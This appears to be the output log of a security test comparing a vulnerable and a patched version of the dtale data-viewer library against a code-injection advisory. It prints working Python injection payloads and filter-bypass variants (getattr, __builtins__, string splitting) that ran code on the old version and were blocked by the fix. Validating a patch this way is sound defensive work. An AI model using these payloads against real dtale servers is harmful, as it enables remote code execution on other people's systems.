============================================================ Testing: Vulnerable (< 3.20.0) Path: /root/.pruva/runs/ghsa-c87c-78rc-vmv2_20260220-154228/dtale_repo ============================================================ [INFO] Security validation features are ABSENT: cannot import name 'ColumnFilterSecurity' from 'dtale.column_filters' (/root/.pruva/runs/ghsa-c87c-78rc-vmv2_20260220-154228/dtale_repo/dtale/column_filters.py) [TEST 1] OutlierFilter with direct RCE payload [VULNERABLE] OutlierFilter accepted raw malicious query! [TEST 2] StringFilter with code injection in value [VULNERABLE] Malicious code in query: `name` == "__import__('os').system('echo RCE')" [TEST 3] Bypass attempt: Case variations [BYPASS] Case variation accepted! [TEST 4] Bypass attempt: String splitting across parameters [BYPASS] String split accepted: 0 <= `name`.str.len() <= 1) or __import__('os').system('echo RCE') or (1==1 [TEST 5] Bypass attempt: getattr indirect access [BYPASS] getattr accepted: `name` == "getattr(__builtins__, '__import__')('os').system('echo RCE')" [TEST 6] Bypass attempt: __builtins__ access [BYPASS] __builtins__ accepted: `name` == "__builtins__.__import__('os').system('echo RCE')" [TEST 7] run_query validation test [ERROR] run_query: "__import__" is not a supported function [TEST 8] NumericFilter with code injection attempt [VULNERABLE] NumericFilter accepted malicious value! [TEST 9] DateFilter with code injection attempt [VULNERABLE] DateFilter accepted malicious value! ============================================================ Results for Vulnerable (< 3.20.0): ============================================================ Vulnerable: 4 Bypass found: 4 Blocked: 0 Errors: 1 [CRITICAL] BYPASS FOUND! 4 bypass(es) work against Vulnerable (< 3.20.0) ============================================================ Testing: Fixed (3.20.0+) Path: /root/.pruva/runs/ghsa-c87c-78rc-vmv2_20260220-154228/vuln_variant/dtale_fixed ============================================================ [INFO] Security validation features are PRESENT [TEST 1] OutlierFilter with direct RCE payload [BLOCKED] Input validation rejected: Outlier filter query contains potentially unsafe content: "__import__('os').system('echo RCE')" [TEST 2] StringFilter with code injection in value [BLOCKED] Input validation rejected: Filter value contains potentially unsafe content: "__import__('os').system('echo RCE')" [TEST 3] Bypass attempt: Case variations [BLOCKED] Case variation rejected: Filter value contains potentially unsafe content: "__IMPORT__('OS').SYSTEM('ECHO RCE')" [TEST 4] Bypass attempt: String splitting across parameters [BLOCKED] String split rejected: Filter value contains potentially unsafe content: "0,1) or __import__('os').system('echo RCE') or (1==1" [TEST 5] Bypass attempt: getattr indirect access [BLOCKED] getattr rejected: Filter value contains potentially unsafe content: "getattr(__builtins__, '__import__')('os').system('echo RCE')" [TEST 6] Bypass attempt: __builtins__ access [BLOCKED] __builtins__ rejected: Filter value contains potentially unsafe content: "__builtins__.__import__('os').system('echo RCE')" [TEST 7] run_query validation test [BLOCKED] run_query rejected: Query contains potentially unsafe content and has been blocked: "`age` > 0 and __import__('os').system('echo RCE')" [TEST 8] NumericFilter with code injection attempt [BLOCKED] NumericFilter rejected: Expected numeric value, got: "__import__('os').system('echo RCE')" [TEST 9] DateFilter with code injection attempt [BLOCKED] DateFilter rejected: Date filter value contains invalid characters: "2024-01-01') or __import__('os').system('echo RCE') or ('1" ============================================================ Results for Fixed (3.20.0+): ============================================================ Vulnerable: 0 Bypass found: 0 Blocked: 9 Errors: 0 [SECURE] No vulnerabilities or bypasses found in Fixed (3.20.0+) ============================================================ FINAL SUMMARY ============================================================ [RESULT] No bypass found - The fix appears complete for tested vectors. [RESULT] The vulnerable version is exploitable; fixed version blocks attacks.